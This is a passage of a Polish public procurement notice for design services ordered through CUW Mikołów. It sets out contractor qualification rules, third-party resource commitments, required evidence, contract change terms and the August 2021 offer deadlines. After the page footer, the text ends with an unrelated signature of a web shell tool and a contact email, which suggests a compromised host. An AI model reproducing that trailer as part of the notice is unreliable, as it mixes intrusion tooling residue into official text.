najmniej jeden projekt budowlany zagospodarowania terenu o wartości minimalnej<br/>prac projektowych 20.000,00 zł brutto.<br/>Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza<br/>odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw<br/>Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.<br/>12a oraz innych przepisów ustawy Prawo Budowlane (tj. Dz. U. z 2010 r., Nr 243, poz. 1623 ze<br/>zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych<br/>w państwach członkowskich Unii Europejskiej (Dz.U. 2008 r., Nr 63, poz. 394).<br/>3. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej<br/>Wykonawców warunek zostanie uznany za spełniony, jeżeli jeden z Wykonawców spełni<br/>warunek samodzielnie lub łącznie spełnią warunek.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne<br/>przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>5. Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu,<br/>polegać na zdolnościach technicznych lub zawodowych lub sytuacji ekonomicznej lub<br/>finansowej podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków<br/>prawnych.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>7. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz<br/>z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów.<br/>8. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 6 potwierdza, że<br/>stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty<br/>dostęp do tych zasobów oraz określa w szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega<br/>w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane<br/>zdolności dotyczą.<br/>9. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na<br/>wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w<br/>art. 112 ust. 2 pkt 3 i 4, oraz, jeżeli to dotyczy, kryteriów selekcji, a także bada, czy nie zachodzą<br/>wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy.<br/>10. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z<br/>Wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną<br/>przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za<br/>nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>11. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu<br/>udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda,<br/>aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym<br/>podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w<br/>postępowaniu.<br/>12. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub<br/>sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania wniosków o<br/>dopuszczenie do udziału<br/>w postępowaniu albo ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby.<br/>13. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w Rozdziale VIII<br/>pkt 1 SWZ, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak<br/>podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w<br/>postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby, zgodnie<br/>z katalogiem dokumentów określonych w Rozdziale VIII SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed udzieleniem zamówienia wezwie Wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania podmiotowych środków dowodowych:<br/>a) wykazu osób (wskazanych w Rozdziale VI. pkt 2 ppkt a), skierowanych przez Wykonawcę do<br/>realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie pracami<br/>projektowymi (imię<br/>i nazwisko głównego projektanta), wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją<br/>o podstawie dysponowania tymi osobami – zgodnie z załącznikiem nr 7 do SWZ;<br/>b) wykazu usług (wskazanych w Rozdziale VI. pkt 2 ppkt b), wykonanych nie wcześniej niż w okresie<br/>ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz<br/>załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami<br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>usługi zostały wykonane, a jeżeli Wykonawca nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie Wykonawcy - zgodnie z załącznikiem nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, zgodnie z art. 58 ust. 1.<br/>ustawy PZP.<br/>W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo winno być załączone do oferty w formie oryginału lub kopii poświadczonej<br/>notarialnie. Jeżeli spółka cywilna reprezentowana jest przez wszystkich wspólników lub zakres<br/>reprezentacji wynika z umowy spółki, wystarczającym jest dołączenie do oferty kopii umowy<br/>spółki. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenie, o którym mowa w Rozdziale VIII. pkt 1 SWZ składa każdy z Wykonawców.<br/>Oświadczenie to ma potwierdzać spełnianie warunków udziału w postępowaniu oraz brak<br/>podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 ustawy PZP oraz wskazanym we wzorze<br/>umowy, stanowiącym załącznik nr 5 do SWZ. Wszelkie zmiany umowy wymagają formy<br/>pisemnej pod rygorem nieważności takiej zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/cuw_mikolow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-06 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-04</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-29 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com